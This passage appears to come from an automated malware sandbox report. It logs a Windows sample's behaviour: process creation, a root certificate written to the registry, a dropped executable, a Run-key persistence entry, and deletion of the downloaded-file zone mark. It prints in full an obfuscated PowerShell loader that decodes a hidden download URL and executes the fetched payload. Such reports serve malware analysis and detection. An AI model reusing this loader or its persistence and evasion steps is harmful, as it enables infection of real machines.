to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
Source: newfile.exe.8.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
Source: newfile.exe.8.dr Static PE information: section name: .didat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_06FC0ABF push eax; mov dword ptr [esp], ecx 1_2_06FC0AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029EA900 pushfd ; retf 8_2_029EAC59
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C3376D push ecx; ret 10_2_00C33780
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C313F8 pushfd ; retf 10_2_00C313F9
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C33890 push ds; ret 10_2_00C33891

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
